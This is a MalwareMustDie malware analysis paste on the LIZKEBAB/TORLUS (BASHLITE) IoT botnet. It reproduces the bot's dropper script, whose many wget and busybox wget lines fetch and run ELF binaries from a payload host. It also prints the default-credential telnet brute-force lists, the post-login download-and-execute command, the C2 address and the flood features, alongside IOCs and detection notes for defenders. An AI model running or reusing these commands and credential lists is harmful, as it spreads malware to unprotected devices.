MalwareMustDie

TORLUS.C / LIZKEBAB / GAYFGT / BASHDOOR

Feb 17th, 2016
  1. #############################################
  2. ##
  3. ##  THIS IS THE EXPLANATION OF HOW
  4. ##  LIZKEBAB / TORLUS
  5. ##  AKA: GAYFGT / BASHDOOR / BASHLITE
  6. ##  WORKS, IN THE VERSION THAT IS CURRENTLY UP AND ALIVE
  7. ##
  8. ##  noted by @unixfreaxjp / #MalwareMustDie
  9. ##
  10. ############################################
  11.  
  12. // location of the payload/dropper host 208.67.1.142. This is the HTTP server the binaries and dropper scripts are fetched from; the C2 the bot actually talks to is 149.91.89.253:443 (see the .rodata strings and the connect() trace below). Network IOCs from this sample: 208.67.1.142 (HTTP, paths /hack/ and /qbot/) and 149.91.89.253 TCP/443.
  13. { "ip": "208.67.1.142",
  14.   "hostname": "No Hostname",
  15.   "city": "Kansas City",
  16.   "region": "Missouri",
  17.   "country": "US",
  18.   "loc": "39.1472,-94.5735",
  19.   "org": "AS33387 DataShack, LC",
  20.   "postal": "64116" }
  21.  
  22.  
  23. // dropper scripts hosted on the payload server (one path used for the initial install, one for updates):
  24. 208.67.1.142/hack/Binarys.sh (install)
  25. 208.67.1.142/qbot/Binarys.sh (updates)
  26.  
  27. // The dropper fetches and runs one ELF binary per CPU architecture. See below how the sample was prepared for multiple architectures (MIPS, MIPSEL, SH4, x86/i586/i686, ARMv4l/v5l/v6, PowerPC, SPARC, and presumably m68k, spelled "m86k" in the file name):
  28.  
  29. $ cat Binarys.sh
  # Dropper script (Binarys.sh) exactly as served from the payload host; reproduced
  # for analysis only - DO NOT RUN. It has no shebang: the telnet payload below runs it
  # as `sh /tmp/bash.sh`. One line per target architecture: download the ELF into /tmp,
  # mark it executable, exec it. Each line is an `&&` chain, so it stops at the first
  # failure, and `wget -q` prints nothing, so the whole script is silent. A binary built
  # for the wrong CPU fails to exec and the next line is tried; presumably the matching
  # binary backgrounds itself so the remaining lines still run (not confirmed here).
  30. cd /tmp && wget -q http://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
  31. cd /tmp && wget -q http://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
  32. cd /tmp && wget -q http://208.67.1.142/hack/telsh4 && chmod +x telsh4 && ./telsh4
  33. cd /tmp && wget -q http://208.67.1.142/hack/telx86 && chmod +x telx86 && ./telx86
  34. cd /tmp && wget -q http://208.67.1.142/hack/telarmv6 && chmod +x telarmv6 && ./telarmv6
  35. cd /tmp && wget -q http://208.67.1.142/hack/teli686 && chmod +x teli686 && ./teli686
  36. cd /tmp && wget -q http://208.67.1.142/hack/telpowerpc && chmod +x telpowerpc && ./telpowerpc
  37. cd /tmp && wget -q http://208.67.1.142/hack/teli586 && chmod +x teli586 && ./teli586
  38. cd /tmp && wget -q http://208.67.1.142/hack/telm86k && chmod +x telm86k && ./telm86k
  39. cd /tmp && wget -q http://208.67.1.142/hack/telsparc && chmod +x telsparc && ./telsparc
  40. cd /tmp && wget -q http://208.67.1.142/hack/telarmv5l && chmod +x telarmv5l && ./telarmv5l
  41. cd /tmp && wget -q http://208.67.1.142/hack/telarmv4l && chmod +x telarmv4l && ./telarmv4l
  # Cleanup: deletes every tel* file from the current directory (/tmp after the cd above).
  # On Linux an already-running process keeps running after its executable is unlinked,
  # so this removes the on-disk artefact without stopping the bot. A tel* file appearing
  # in /tmp and vanishing shortly afterwards is itself a useful detection signal.
  42. rm -rf tel*
  # Second pass, identical to the first but using `busybox wget`. This covers embedded
  # devices (routers, IoT) that ship BusyBox but no standalone wget in PATH. Note that
  # this pass has no cleanup line, so on such devices the tel* files stay in /tmp.
  # Hunting notes: HTTP GETs to 208.67.1.142/hack/ or /qbot/, new executables named tel*
  # in /tmp, and `wget ... && chmod +x ... && ./...` chains run by sh out of /tmp.
  43. cd /tmp && busybox wget -q http://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
  44. cd /tmp && busybox wget -q http://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
  45. cd /tmp && busybox wget -q http://208.67.1.142/hack/telsh4 && chmod +x telsh4 && ./telsh4
  46. cd /tmp && busybox wget -q http://208.67.1.142/hack/telx86 && chmod +x telx86 && ./telx86
  47. cd /tmp && busybox wget -q http://208.67.1.142/hack/telarmv6 && chmod +x telarmv6 && ./telarmv6
  48. cd /tmp && busybox wget -q http://208.67.1.142/hack/teli686 && chmod +x teli686 && ./teli686
  49. cd /tmp && busybox wget -q http://208.67.1.142/hack/telpowerpc && chmod +x telpowerpc && ./telpowerpc
  50. cd /tmp && busybox wget -q http://208.67.1.142/hack/teli586 && chmod +x teli586 && ./teli586
  51. cd /tmp && busybox wget -q http://208.67.1.142/hack/telm86k && chmod +x telm86k && ./telm86k
  52. cd /tmp && busybox wget -q http://208.67.1.142/hack/telsparc && chmod +x telsparc && ./telsparc
  53. cd /tmp && busybox wget -q http://208.67.1.142/hack/telarmv5l && chmod +x telarmv5l && ./telarmv5l
  54. cd /tmp && busybox wget -q http://208.67.1.142/hack/telarmv4l && chmod +x telarmv4l && ./telarmv4l
  55.  
  56. // fetching the x86 sample (telx86) from the payload host. Note the ELF is served by Apache/2.2.15 (CentOS) with Content-Type text/plain and Content-Length 200055 - an ELF delivered as text/plain from a bare IP is a cheap proxy-level detection:
  57.  
  58. HTTP/1.1 200 OK
  59. Date: Wed, 17 Feb 2016 15:25:25 GMT
  60. Server: Apache/2.2.15 (CentOS)
  61. Last-Modified: Fri, 29 Jan 2016 02:33:39 GMT
  62. ETag: "4371a-30d77-52a6fdcee7bf6"
  63. Accept-Ranges: bytes
  64. Content-Length: 200055
  65. Connection: close
  66. Content-Type: text/plain; charset=UTF-8
  67. 200 OK
  68. URI content encoding = 'UTF-8'
  69. Length: 200055 (195K) [text/plain]
  70. Saving to: 'telx86'
  71. telx86  100%[==========>] 195.37K  25.3KB/sin 8.6s
  72. 2016-02-18 00:25:34 (22.6 KB/s) - 'telx86' saved [200055/200055]
  73.  
  74.  
  75. #############################################
  76. ##
  77. ##  THIS IS HOW IT WORKS
  78. ##  EXPLAINED IN SIMPLEST WAY
  79. ##
  80. ############################################
  81.  
  82. //// hard-coded strings found in .rodata of the x86 sample (offsets as shown by the disassembler):
  83.  
  84. // C2 address and port, hard-coded in the binary (the bot connects here, see the connect() trace below)
  85.  
  86. .rodata:0805D2A0 00000012 C 149.91.89.253:443
  87.  
  88. // root (first username tried by the telnet brute-forcer)
  89.  
  90. .rodata:0805D2B2 00000005 C root  
  91.  
  92. // remaining usernames tried by the telnet brute-forcer
  93.  
  94. .rodata:0805D2B8 00000006 C admin
  95. .rodata:0805D2BF 00000005 C user  
  96. .rodata:0805D2C5 00000006 C login
  97. .rodata:0805D2CC 00000006 C guest
  98. .rodata:0805D2D3 00000008 C support  
  99. .rodata:0805D2DC 00000005 C toor  
  100.  
  101. // passwords tried, paired with the usernames above - all typical factory defaults, so devices whose credentials were never changed are the intended victims
  102.  
  103. .rodata:0805D2E2 00000009 C changeme
  104. .rodata:0805D2EC 00000005 C 1234  
  105. .rodata:0805D2F2 00000006 C 12345
  106. .rodata:0805D2F9 00000007 C 123456
  107. .rodata:0805D301 00000008 C default  
  108. .rodata:0805D30A 00000005 C pass  
  109. .rodata:0805D310 00000009 C password
  110.  
  111. // commands sent over the telnet session once a login succeeds: drop to a shell, fetch the dropper from the payload host into /tmp/bash.sh, run it with sh, then delete it. The `/bin/busybox;echo -e 'gayfgt'` line looks like a probe whose echoed marker confirms a working shell (inferred from the strings, not confirmed here); `REPORT %s:%s:%s` is presumably how a successful login (likely ip:user:pass) is reported back to the C2 - also not confirmed from these strings alone.
  112.  
  113. .rodata:0805D795 00000005 C sh\r\n
  114. .rodata:0805D79A 00000008 C shell\r\n
  115. .rodata:0805D7A4 00000074 C wget http://208.67.1.142/qbot/Binarys.sh -O /tmp/bash.sh;chmod +x /tmp/bash.sh ; sh /tmp/bash.sh; rm /tmp/bash.sh\r\n
  116. .rodata:0805D818 00000020 C /bin/busybox;echo -e 'gayfgt'\r\n
  117. .rodata:0805D842 00000010 C REPORT %s:%s:%s
  118. .rodata:0805D852 00000007 C gayfgt
  119.  
  120. ///// the bot then connects out to the C2 on fd 3 (TCP 149.91.89.253:443). Despite the port this appears to be plain TCP, not TLS: the one-byte recv() trace below shows the command arriving in cleartext, so protocol inspection on 443 would catch it.
  121.  
  122. 21008 connect(3, {AF_INET, 443, 149.91.89.253);
  123.  
  124. [cpuset] 20873 mmd  cwd    DIR      8,1     4096       2 /
  125. [cpuset] 20873 mmd  rtd    DIR      8,1     4096       2 /
  126. [cpuset] 20873 mmd  txt    REG      8,6   161632 7209159 /SAMPLE
  127. [cpuset] 20873 mmd    0u   CHR    136,2 0t0  5 /dev/pts/2
  128. [cpuset] 20873 mmd    1u   CHR    136,2 0t0  5 /dev/pts/2
  129. [cpuset] 20873 mmd    2u   CHR    136,2 0t0  5 /dev/pts/2
  130. [cpuset] 20873 mmd    3u  IPv4 23161746 0t0TCP MMD.ORG:59869->149.91.89.253:443 (ESTABLISHED)
  131.  
  132. ////// C2 command received one byte at a time: `!* SCANNER ON\n` - turns the telnet scanner on (cf. the `SCANNER ON | OFF` usage string further below)
  133.  
  134. recv(3, "!",  1, 0)
  135. recv(3, "*",  1, 0)
  136. recv(3, " ",  1, 0)
  137. recv(3, "S",  1, 0)
  138. recv(3, "C",  1, 0)
  139. recv(3, "A",  1, 0)
  140. recv(3, "N",  1, 0)
  141. recv(3, "N",  1, 0)
  142. recv(3, "E",  1, 0)
  143. recv(3, "R",  1, 0)
  144. recv(3, " ",  1, 0)
  145. recv(3, "O",  1, 0)
  146. recv(3, "N",  1, 0)
  147. recv(3, "\n", 1, 0)
  148.  
  149. ///// the bot forks a child process to run the telnet scan (the `FORK` string is echoed to stdout)
  150.  
  151. fork()
  152. write(1, "FORK\n", 5);
  153.  
  154. /////// after the fork the child (pid 20874) inherits the C2 socket on fd 3 and opens parallel connections to port 23 on consecutive addresses of one /24:
  155.  
  156. [cpuset] 20874 mmd  cwd    DIR      8,1     4096        2 /
  157. [cpuset] 20874 mmd  rtd    DIR      8,1     4096        2 /
  158. [cpuset] 20874 mmd  txt    REG      8,6   161632  7209159 /SAMPLE
  159. [cpuset] 20874 mmd    0u   CHR    136,2 0t0   5 /dev/pts/2
  160. [cpuset] 20874 mmd    1u   CHR    136,2 0t0   5 /dev/pts/2
  161. [cpuset] 20874 mmd    2u   CHR    136,2 0t0   5 /dev/pts/2
  162. [cpuset] 20874 mmd    3u  IPv4 23161746 0t0 TCP MMD.ORG:59869->149.91.89.253:443 (ESTABLISHED)
  163. [cpuset] 20874 mmd    4u  IPv4 23161774 0t0 TCP MMD.ORG:57971->11.159.98.247:23 (SYN_SENT)
  164. [cpuset] 20874 mmd    5u  IPv4 23161775 0t0 TCP MMD.ORG:56070->11.159.98.248:23 (SYN_SENT)
  165. [cpuset] 20874 mmd    6u  IPv4 23166590 0t0 TCP MMD.ORG:55366->11.159.98.249:23 (SYN_SENT)
  166. [cpuset] 20874 mmd    7u  IPv4 23166591 0t0 TCP MMD.ORG:54561->11.159.98.250:23 (SYN_SENT)
  167. [cpuset] 20874 mmd    8u  IPv4 23167725 0t0 TCP MMD.ORG:39495->11.159.98.251:23 (SYN_SENT)
  168. [cpuset] 20874 mmd    9u  IPv4 23167726 0t0 TCP MMD.ORG:38934->11.159.98.252:23 (SYN_SENT)
  169. [cpuset] 20874 mmd   10u  IPv4 23167727 0t0 TCP MMD.ORG:33664->11.159.98.253:23 (SYN_SENT)
  170. [cpuset] 20874 mmd   11u  IPv4 23167728 0t0 TCP MMD.ORG:49161->11.159.98.254:23 (SYN_SENT)
  171. [cpuset] 20874 mmd   12u  IPv4 23165034 0t0 TCP MMD.ORG:51762->11.159.98.255:23 (SYN_SENT)
  172. // PoC picture: https://pbs.twimg.com/media/Cbb4Nj4UAAAtn-9.jpg
  173.  
  174. // scanning targets observed (the scanner appears to sweep one /24 at a time, cf. the `%d.%d.%d.0` format string below):
  175. 11.159.98.x ; 174.96.64.x ; 207.193.179.x ; 136.102.45.x ;
  176. These are mostly dial-up networks in the USA; the scanner is aimed at routers and similar devices that expose a telnet service with default credentials (the username/password lists above).
  177.  
  178. // other strings in the ELF binary show the known bot feature set: PING/PONG keepalive, GETLOCALIP (strings suggest it reads /proc/net/route and uses 8.8.8.8 to find the local address), raw-socket TCP flood with selectable flags (syn/rst/fin/ack/psh/all), UDP/TCP/JUNK/HOLD flood modes, KILLATTK, LOLNOGTFO, SH for remote command execution via `/bin/sh -c ... 2>&1`, and a /proc/cpuinfo BOGOMIPS read. The `0.9.30` string together with the RPC/xdr and /etc/config/resolv.conf helpers looks like a statically linked uClibc (inferred):
  179.  
  180. .rodata:0805D31A (null)
  181. .rodata:0805D321 buf: %s\n
  182. .rodata:0805D32A -c
  183. .rodata:0805D32D sh
  184. .rodata:0805D330 /bin/sh  
  185. .rodata:0805D740 /proc/cpuinfo  
  186. .rodata:0805D74E BOGOMIPS
  187. .rodata:0805D757 PING  
  188. .rodata:0805D75C :>%$#
  189. .rodata:0805D763 %d.%d.%d.%d
  190. .rodata:0805D76F %d.%d.%d.0  
  191. .rodata:0805D77A login:
  192. .rodata:0805D780 \r\n  
  193. .rodata:0805D783 password:
  194. .rodata:0805D78C incorrect
  195. .rodata:0805D838 multi-call
  196. .rodata:0805D88C Failed opening raw socket.
  197. .rodata:0805D8A8 Failed setting raw headers mode.
  198. .rodata:0805D8C9 all
  199. .rodata:0805D8CF syn
  200. .rodata:0805D8D3 rst
  201. .rodata:0805D8D7 fin
  202. .rodata:0805D8DB ack
  203. .rodata:0805D8DF psh
  204. .rodata:0805D8E3 Invalid flag
  205. .rodata:0805D8F5 PONG!
  206. .rodata:0805D8FB GETLOCALIP  
  207. .rodata:0805D906 My IP: %s
  208. .rodata:0805D910 SCANNER  
  209. .rodata:0805D918 SCANNER ON | OFF  
  210. .rodata:0805D929 OFF
  211. .rodata:0805D92D ON
  212. .rodata:0805D930 FORK  
  213. .rodata:0805D935 HOLD  
  214. .rodata:0805D93A JUNK  
  215. .rodata:0805D93F UDP
  216. .rodata:0805D943 TCP
  217. .rodata:0805D947 KILLATTK
  218. .rodata:0805D950 Killed %d.  
  219. .rodata:0805D95B None Killed.
  220. .rodata:0805D968 LOLNOGTFO
  221. .rodata:0805D972 8.8.8.8  
  222. .rodata:0805D97A /proc/net/route
  223. .rodata:0805D98A \t00000000\t
  224. .rodata:0805D995 [cpuset]
  225. .rodata:0805D99E fork failed\n  
  226. .rodata:0805D9AD FAILED TO CONNECT
  227. .rodata:0805D9BF PONG  
  228. .rodata:0805D9C4 DUP
  229. .rodata:0805D9C8 SH
  230. .rodata:0805D9CB %s 2>&1  
  231. .rodata:0805D9D7 LINK CLOSED
  232. .rodata:0805DA18 0.9.30
  233. .rodata:0805E088 -c
  234. .rodata:0805E08B /bin/sh  
  235. .rodata:0805E2EC /dev/null
  236. .rodata:0805E334 clntudp_create: out of memory\n  
  237. .rodata:0805E3A0 bad auth_len gid %d str %d auth %d\n
  238. .rodata:0805E3C4 xdr_string: out of memory\n
  239. .rodata:0805E3DF xdr_bytes: out of memory\n
  240. .rodata:0805E428 (nil)
  241. .rodata:0805E42E (null)
  242. .rodata:0805E485 npxXoudifFeEgGaACScs
  243. .rodata:0805F050 __get_myaddress: socket
  244. .rodata:0805F068 __get_myaddress: ioctl (get interface configuration)  
  245. .rodata:0805F09D __get_myaddress: ioctl  
  246. .rodata:0805F0B4 Cannot register service
  247. .rodata:0805F0DC xdr_array: out of memory\n
  248. .rodata:0805F0F8 /etc/resolv.conf  
  249. .rodata:0805F109 /etc/config/resolv.conf
  250. .rodata:0805F121 nameserver  
  251. .rodata:0805F12C domain
  252. .rodata:0805F133 search
  253. .rodata:0805F13A %s%s%m\n
  254. .rodata:0805F21C RPC: (unknown error code)  
  255. .rodata:0805F236 %s:
  256. .rodata:0805F23B  -
  257. .rodata:0805F23F ; errno = %s
  258. .rodata:0805F24C ; low version = %lu, high version = %lu
  259. .rodata:0805F274 ; why =  
  260. .rodata:0805F27D (unknown authentication error - %d)
  261. .rodata:0805F2A1 ; s1 = %lu, s2 = %lu
  262. .rodata:0805F694 %x
  263. .rodata:0805F697 0123456789abcdef  
  264. .rodata:0805F6A8 /etc/hosts  
  265. .rodata:0805F6B3 /etc/config/hosts
  266.  
  267. ---
  268. #MalwareMustDie